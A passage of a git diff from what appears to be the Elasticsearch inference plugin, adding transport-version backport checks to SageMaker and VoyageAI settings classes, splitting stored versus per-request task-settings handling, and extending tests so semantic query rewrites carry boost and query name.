+    public SageMakerTaskSettings override(Map<String, Object> newSettings) {
+        var validationException = new ValidationException();
+        var updateTaskSettings = fromMap(newSettings, apiTaskSettings.override(newSettings), validationException);
+        validationException.throwIfValidationErrorsExist();
+        return override(updateTaskSettings);
+    }
+
+    private SageMakerTaskSettings override(SageMakerTaskSettings updateTaskSettings) {
         var updatedExtraTaskSettings = updateTaskSettings.apiTaskSettings().equals(SageMakerStoredTaskSchema.NO_OP)
             ? apiTaskSettings
             : updateTaskSettings.apiTaskSettings();
@@ -101,9 +111,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_SAGEMAKER;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_8_19);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeOptionalString(customAttributes);
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredServiceSchema.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredServiceSchema.java
index 9fb320a2d364a..b3d948a85de97 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredServiceSchema.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredServiceSchema.java
@@ -29,9 +29,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_SAGEMAKER;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_8_19);
+    }
+
     @Override
     public void writeTo(StreamOutput out) {
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredTaskSchema.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredTaskSchema.java
index 2aa2f9556d415..a3ff632f466c2 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredTaskSchema.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredTaskSchema.java
@@ -39,9 +39,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_SAGEMAKER;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_8_19);
+    }
+
     @Override
     public void writeTo(StreamOutput out) {}
 
@@ -61,4 +68,8 @@ default boolean isFragment() {
 
     @Override
     SageMakerStoredTaskSchema updatedTaskSettings(Map<String, Object> newSettings);
+
+    default SageMakerStoredTaskSchema override(Map<String, Object> newSettings) {
+        return updatedTaskSettings(newSettings);
+    }
 }
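Note: the SageMaker hunks above split two paths that previously shared updatedTaskSettings(Map): updatedTaskSettings remains the path used when new task settings are persisted on the inference endpoint, while the new override(Map) is the per-request path, defaulting to updatedTaskSettings for schemas that allow both. A hedged sketch of the intended call sites, with variable names invented for illustration only:

    // storing settings on the endpoint goes through the validating path
    SageMakerTaskSettings persisted = taskSettings.updatedTaskSettings(newSettings);

    // task_settings sent with a single inference request apply to that request only
    SageMakerTaskSettings perRequest = taskSettings.override(requestTaskSettings);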
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayload.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayload.java
index 46c5a9eb30a9a..781b1e906a17f 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayload.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayload.java
@@ -88,12 +88,6 @@ default SdkBytes requestBytes(SageMakerModel model, SageMakerInferenceRequest re
 
     @Override
     default SageMakerElasticTaskSettings apiTaskSettings(Map<String, Object> taskSettings, ValidationException validationException) {
-        if (taskSettings != null && (taskSettings.isEmpty() == false)) {
-            validationException.addValidationError(
-                InferenceAction.Request.TASK_SETTINGS.getPreferredName()
-                    + " is only supported during the inference request and cannot be stored in the inference endpoint."
-            );
-        }
         return SageMakerElasticTaskSettings.empty();
     }
 
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticTextEmbeddingPayload.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticTextEmbeddingPayload.java
index cf9d24a86dcc3..6e1407beab1d8 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticTextEmbeddingPayload.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticTextEmbeddingPayload.java
@@ -250,9 +250,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_SAGEMAKER_ELASTIC;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER_ELASTIC)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_ELASTIC_8_19);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeOptionalVInt(dimensions);
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/SageMakerElasticTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/SageMakerElasticTaskSettings.java
index 3cdcbb35ffdc9..dc0bc91fccd75 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/SageMakerElasticTaskSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/SageMakerElasticTaskSettings.java
@@ -9,10 +9,12 @@
 
 import org.elasticsearch.TransportVersion;
 import org.elasticsearch.TransportVersions;
+import org.elasticsearch.common.ValidationException;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
 import org.elasticsearch.core.Nullable;
 import org.elasticsearch.xcontent.XContentBuilder;
+import org.elasticsearch.xpack.core.inference.action.InferenceAction;
 import org.elasticsearch.xpack.inference.services.sagemaker.schema.SageMakerStoredTaskSchema;
 
 import java.io.IOException;
@@ -40,6 +42,16 @@ public boolean isEmpty() {
 
     @Override
     public SageMakerStoredTaskSchema updatedTaskSettings(Map<String, Object> newSettings) {
+        var validationException = new ValidationException();
+        validationException.addValidationError(
+            InferenceAction.Request.TASK_SETTINGS.getPreferredName()
+                + " is only supported during the inference request and cannot be stored in the inference endpoint."
+        );
+        throw validationException;
+    }
+
+    @Override
+    public SageMakerStoredTaskSchema override(Map<String, Object> newSettings) {
         return new SageMakerElasticTaskSettings(newSettings);
     }
 
@@ -50,9 +62,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_SAGEMAKER_ELASTIC;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER_ELASTIC)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_ELASTIC_8_19);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeGenericMap(passthroughSettings);
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/OpenAiTextEmbeddingPayload.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/OpenAiTextEmbeddingPayload.java
index 276c407d694d6..6fcbd309551e3 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/OpenAiTextEmbeddingPayload.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/OpenAiTextEmbeddingPayload.java
@@ -138,9 +138,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_SAGEMAKER;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_8_19);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeOptionalInt(dimensions);
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/SageMakerOpenAiTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/SageMakerOpenAiTaskSettings.java
index 4eeba9f69022d..b8ce19ba712bf 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/SageMakerOpenAiTaskSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/SageMakerOpenAiTaskSettings.java
@@ -37,9 +37,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_SAGEMAKER_CHAT_COMPLETION;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER_CHAT_COMPLETION)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_CHAT_COMPLETION_8_19);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeOptionalString(user);
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/VoyageAIServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/VoyageAIServiceSettings.java
index 75497d1a4b4f0..ba7db5bc16f47 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/VoyageAIServiceSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/VoyageAIServiceSettings.java
@@ -108,9 +108,16 @@ public XContentBuilder toXContentFragmentOfExposedFields(XContentBuilder builder
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.VOYAGE_AI_INTEGRATION_ADDED;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED)
+            || version.isPatchFrom(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED_BACKPORT_8_X);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeString(modelId);
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsServiceSettings.java
index cc4db278d0e2b..a0960fb6f74aa 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsServiceSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsServiceSettings.java
@@ -226,9 +226,16 @@ protected XContentBuilder toXContentFragmentOfExposedFields(XContentBuilder buil
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.VOYAGE_AI_INTEGRATION_ADDED;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED)
+            || version.isPatchFrom(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED_BACKPORT_8_X);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         commonSettings.writeTo(out);
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsTaskSettings.java
index 2c6bf3a59c617..11728075fe2b8 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsTaskSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsTaskSettings.java
@@ -162,9 +162,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.VOYAGE_AI_INTEGRATION_ADDED;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED)
+            || version.isPatchFrom(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED_BACKPORT_8_X);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeOptionalEnum(inputType);
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankServiceSettings.java
index 1d3607922c5c2..4e23efac2701c 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankServiceSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankServiceSettings.java
@@ -90,9 +90,16 @@ protected XContentBuilder toXContentFragmentOfExposedFields(XContentBuilder buil
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.VOYAGE_AI_INTEGRATION_ADDED;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED)
+            || version.isPatchFrom(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED_BACKPORT_8_X);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         commonSettings.writeTo(out);
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankTaskSettings.java
index a5004fde1e17e..9e57b58487674 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankTaskSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankTaskSettings.java
@@ -135,9 +135,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.VOYAGE_AI_INTEGRATION_ADDED;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED)
+            || version.isPatchFrom(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED_BACKPORT_8_X);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeOptionalInt(topKDocumentsOnly);
diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticKnnVectorQueryRewriteInterceptorTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticKnnVectorQueryRewriteInterceptorTests.java
index 270cdba6d3469..1f0b56e3d6848 100644
--- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticKnnVectorQueryRewriteInterceptorTests.java
+++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticKnnVectorQueryRewriteInterceptorTests.java
@@ -61,6 +61,14 @@ public void testKnnQueryWithVectorBuilderIsInterceptedAndRewritten() throws IOEx
         QueryRewriteContext context = createQueryRewriteContext(inferenceFields);
         QueryVectorBuilder queryVectorBuilder = new TextEmbeddingQueryVectorBuilder(INFERENCE_ID, QUERY);
         KnnVectorQueryBuilder original = new KnnVectorQueryBuilder(FIELD_NAME, queryVectorBuilder, 10, 100, null);
+        if (randomBoolean()) {
+            float boost = randomFloatBetween(1, 10, randomBoolean());
+            original.boost(boost);
+        }
+        if (randomBoolean()) {
+            String queryName = randomAlphaOfLength(5);
+            original.queryName(queryName);
+        }
         testRewrittenInferenceQuery(context, original);
     }
 
@@ -72,6 +80,14 @@ public void testKnnWithQueryBuilderWithoutInferenceIdIsInterceptedAndRewritten()
         QueryRewriteContext context = createQueryRewriteContext(inferenceFields);
         QueryVectorBuilder queryVectorBuilder = new TextEmbeddingQueryVectorBuilder(null, QUERY);
         KnnVectorQueryBuilder original = new KnnVectorQueryBuilder(FIELD_NAME, queryVectorBuilder, 10, 100, null);
+        if (randomBoolean()) {
+            float boost = randomFloatBetween(1, 10, randomBoolean());
+            original.boost(boost);
+        }
+        if (randomBoolean()) {
+            String queryName = randomAlphaOfLength(5);
+            original.queryName(queryName);
+        }
         testRewrittenInferenceQuery(context, original);
     }
 
@@ -82,14 +98,23 @@ private void testRewrittenInferenceQuery(QueryRewriteContext context, KnnVectorQ
             rewritten instanceof InterceptedQueryBuilderWrapper
         );
         InterceptedQueryBuilderWrapper intercepted = (InterceptedQueryBuilderWrapper) rewritten;
+        assertEquals(original.boost(), intercepted.boost(), 0.0f);
+        assertEquals(original.queryName(), intercepted.queryName());
         assertTrue(intercepted.queryBuilder instanceof NestedQueryBuilder);
+
         NestedQueryBuilder nestedQueryBuilder = (NestedQueryBuilder) intercepted.queryBuilder;
+        assertEquals(original.boost(), nestedQueryBuilder.boost(), 0.0f);
+        assertEquals(original.queryName(), nestedQueryBuilder.queryName());
         assertEquals(SemanticTextField.getChunksFieldName(FIELD_NAME), nestedQueryBuilder.path());
+
         QueryBuilder innerQuery = nestedQueryBuilder.query();
         assertTrue(innerQuery instanceof KnnVectorQueryBuilder);
         KnnVectorQueryBuilder knnVectorQueryBuilder = (KnnVectorQueryBuilder) innerQuery;
+        assertEquals(1.0f, knnVectorQueryBuilder.boost(), 0.0f);
+        assertNull(knnVectorQueryBuilder.queryName());
         assertEquals(SemanticTextField.getEmbeddingsFieldName(FIELD_NAME), knnVectorQueryBuilder.getFieldName());
         assertTrue(knnVectorQueryBuilder.queryVectorBuilder() instanceof TextEmbeddingQueryVectorBuilder);
+
         TextEmbeddingQueryVectorBuilder textEmbeddingQueryVectorBuilder = (TextEmbeddingQueryVectorBuilder) knnVectorQueryBuilder
             .queryVectorBuilder();
         assertEquals(QUERY, textEmbeddingQueryVectorBuilder.getModelText());
diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticMatchQueryRewriteInterceptorTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticMatchQueryRewriteInterceptorTests.java
index 6987ef33ed63d..b58547e1a92c7 100644
--- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticMatchQueryRewriteInterceptorTests.java
+++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticMatchQueryRewriteInterceptorTests.java
@@ -36,6 +36,8 @@ public class SemanticMatchQueryRewriteInterceptorTests extends ESTestCase {
 
     private static final String FIELD_NAME = "fieldName";
     private static final String VALUE = "value";
+    private static final String QUERY_NAME = "match_query";
+    private static final float BOOST = 5.0f;
 
     @Before
     public void setup() {
@@ -79,6 +81,29 @@ public void testMatchQueryOnNonInferenceFieldRemainsMatchQuery() throws IOExcept
         assertEquals(original, rewritten);
     }
 
+    public void testBoostAndQueryNameInMatchQueryRewrite() throws IOException {
+        Map<String, InferenceFieldMetadata> inferenceFields = Map.of(
+            FIELD_NAME,
+            new InferenceFieldMetadata(index.getName(), "inferenceId", new String[] { FIELD_NAME }, null)
+        );
+        QueryRewriteContext context = createQueryRewriteContext(inferenceFields);
+        QueryBuilder original = createTestQueryBuilder();
+        original.boost(BOOST);
+        original.queryName(QUERY_NAME);
+        QueryBuilder rewritten = original.rewrite(context);
+        assertTrue(
+            "Expected query to be intercepted, but was [" + rewritten.getClass().getName() + "]",
+            rewritten instanceof InterceptedQueryBuilderWrapper
+        );
+        InterceptedQueryBuilderWrapper intercepted = (InterceptedQueryBuilderWrapper) rewritten;
+        assertEquals(BOOST, intercepted.boost(), 0.0f);
+        assertEquals(QUERY_NAME, intercepted.queryName());
+        assertTrue(intercepted.queryBuilder instanceof SemanticQueryBuilder);
+        SemanticQueryBuilder semanticQueryBuilder = (SemanticQueryBuilder) intercepted.queryBuilder;
+        assertEquals(FIELD_NAME, semanticQueryBuilder.getFieldName());
+        assertEquals(VALUE, semanticQueryBuilder.getQuery());
+    }
+
     private MatchQueryBuilder createTestQueryBuilder() {
         return new MatchQueryBuilder(FIELD_NAME, VALUE);
     }
diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticSparseVectorQueryRewriteInterceptorTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticSparseVectorQueryRewriteInterceptorTests.java
index 075955766a0a9..401b7085e2cb5 100644
--- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticSparseVectorQueryRewriteInterceptorTests.java
+++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticSparseVectorQueryRewriteInterceptorTests.java
@@ -58,21 +58,15 @@ public void testSparseVectorQueryOnInferenceFieldIsInterceptedAndRewritten() thr
         );
         QueryRewriteContext context = createQueryRewriteContext(inferenceFields);
         QueryBuilder original = new SparseVectorQueryBuilder(FIELD_NAME, INFERENCE_ID, QUERY);
-        QueryBuilder rewritten = original.rewrite(context);
-        assertTrue(
-            "Expected query to be intercepted, but was [" + rewritten.getClass().getName() + "]",
-            rewritten instanceof InterceptedQueryBuilderWrapper
-        );
-        InterceptedQueryBuilderWrapper intercepted = (InterceptedQueryBuilderWrapper) rewritten;
-        assertTrue(intercepted.queryBuilder instanceof NestedQueryBuilder);
-        NestedQueryBuilder nestedQueryBuilder = (NestedQueryBuilder) intercepted.queryBuilder;
-        assertEquals(SemanticTextField.getChunksFieldName(FIELD_NAME), nestedQueryBuilder.path());
-        QueryBuilder innerQuery = nestedQueryBuilder.query();
-        assertTrue(innerQuery instanceof SparseVectorQueryBuilder);
-        SparseVectorQueryBuilder sparseVectorQueryBuilder = (SparseVectorQueryBuilder) innerQuery;
-        assertEquals(SemanticTextField.getEmbeddingsFieldName(FIELD_NAME), sparseVectorQueryBuilder.getFieldName());
-        assertEquals(INFERENCE_ID, sparseVectorQueryBuilder.getInferenceId());
-        assertEquals(QUERY, sparseVectorQueryBuilder.getQuery());
+        if (randomBoolean()) {
+            float boost = randomFloatBetween(1, 10, randomBoolean());
+            original.boost(boost);
+        }
+        if (randomBoolean()) {
+            String queryName = randomAlphaOfLength(5);
+            original.queryName(queryName);
+        }
+        testRewrittenInferenceQuery(context, original);
     }
 
     public void testSparseVectorQueryOnInferenceFieldWithoutInferenceIdIsInterceptedAndRewritten() throws IOException {
@@ -82,32 +76,52 @@ public void testSparseVectorQueryOnInferenceFieldWithoutInferenceIdIsIntercepted
         );
         QueryRewriteContext context = createQueryRewriteContext(inferenceFields);
         QueryBuilder original = new SparseVectorQueryBuilder(FIELD_NAME, null, QUERY);
+        if (randomBoolean()) {
+            float boost = randomFloatBetween(1, 10, randomBoolean());
+            original.boost(boost);
+        }
+        if (randomBoolean()) {
+            String queryName = randomAlphaOfLength(5);
+            original.queryName(queryName);
+        }
+        testRewrittenInferenceQuery(context, original);
+    }
+
+    public void testSparseVectorQueryOnNonInferenceFieldRemainsUnchanged() throws IOException {
+        QueryRewriteContext context = createQueryRewriteContext(Map.of()); // No inference fields
+        QueryBuilder original = new SparseVectorQueryBuilder(FIELD_NAME, INFERENCE_ID, QUERY);
+        QueryBuilder rewritten = original.rewrite(context);
+        assertTrue(
+            "Expected query to remain sparse_vector but was [" + rewritten.getClass().getName() + "]",
+            rewritten instanceof SparseVectorQueryBuilder
+        );
+        assertEquals(original, rewritten);
+    }
+
+    private void testRewrittenInferenceQuery(QueryRewriteContext context, QueryBuilder original) throws IOException {
         QueryBuilder rewritten = original.rewrite(context);
         assertTrue(
             "Expected query to be intercepted, but was [" + rewritten.getClass().getName() + "]",
             rewritten instanceof InterceptedQueryBuilderWrapper
         );
         InterceptedQueryBuilderWrapper intercepted = (InterceptedQueryBuilderWrapper) rewritten;
+        assertEquals(original.boost(), intercepted.boost(), 0.0f);
+        assertEquals(original.queryName(), intercepted.queryName());
+
         assertTrue(intercepted.queryBuilder instanceof NestedQueryBuilder);
         NestedQueryBuilder nestedQueryBuilder = (NestedQueryBuilder) intercepted.queryBuilder;
         assertEquals(SemanticTextField.getChunksFieldName(FIELD_NAME), nestedQueryBuilder.path());
+        assertEquals(original.boost(), nestedQueryBuilder.boost(), 0.0f);
+        assertEquals(original.queryName(), nestedQueryBuilder.queryName());
+
         QueryBuilder innerQuery = nestedQueryBuilder.query();
         assertTrue(innerQuery instanceof SparseVectorQueryBuilder);
         SparseVectorQueryBuilder sparseVectorQueryBuilder = (SparseVectorQueryBuilder) innerQuery;
         assertEquals(SemanticTextField.getEmbeddingsFieldName(FIELD_NAME), sparseVectorQueryBuilder.getFieldName());
         assertEquals(INFERENCE_ID, sparseVectorQueryBuilder.getInferenceId());
         assertEquals(QUERY, sparseVectorQueryBuilder.getQuery());
-    }
-
-    public void testSparseVectorQueryOnNonInferenceFieldRemainsUnchanged() throws IOException {
-        QueryRewriteContext context = createQueryRewriteContext(Map.of()); // No inference fields
-        QueryBuilder original = new SparseVectorQueryBuilder(FIELD_NAME, INFERENCE_ID, QUERY);
-        QueryBuilder rewritten = original.rewrite(context);
-        assertTrue(
-            "Expected query to remain sparse_vector but was [" + rewritten.getClass().getName() + "]",
-            rewritten instanceof SparseVectorQueryBuilder
-        );
-        assertEquals(original, rewritten);
+        assertEquals(1.0f, sparseVectorQueryBuilder.boost(), 0.0f);
+        assertNull(sparseVectorQueryBuilder.queryName());
     }
 
     private QueryRewriteContext createQueryRewriteContext(Map<String, InferenceFieldMetadata> inferenceFields) {
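Note: the three interceptor test files above converge on one contract for boost and _name under semantic rewriting: the InterceptedQueryBuilderWrapper and the nested query carry the caller's values, while the rewritten inner query is left at the defaults so the boost cannot be applied twice along the nested path. The essence, with innerQueryBuilder standing in for either the sparse-vector or the knn builder:

    assertEquals(original.boost(), nestedQueryBuilder.boost(), 0.0f); // hoisted once onto the wrapper/nested query
    assertEquals(1.0f, innerQueryBuilder.boost(), 0.0f);              // reset on the inner query
    assertNull(innerQueryBuilder.queryName());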
diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterTests.java
index a7cb0234aee59..5b4925d8fb0a3 100644
--- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterTests.java
+++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterTests.java
@@ -616,14 +616,14 @@ public void testIndexingPressure() throws Exception {
 
         IndexingPressure.Coordinating coordinatingIndexingPressure = indexingPressure.getCoordinating();
         assertThat(coordinatingIndexingPressure, notNullValue());
-        verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc0Source));
-        verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc1Source));
-        verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc2Source));
-        verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc3Source));
-        verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc4Source));
-        verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc0UpdateSource));
+        verify(coordinatingIndexingPressure).increment(1, length(doc0Source));
+        verify(coordinatingIndexingPressure).increment(1, length(doc1Source));
+        verify(coordinatingIndexingPressure).increment(1, length(doc2Source));
+        verify(coordinatingIndexingPressure).increment(1, length(doc3Source));
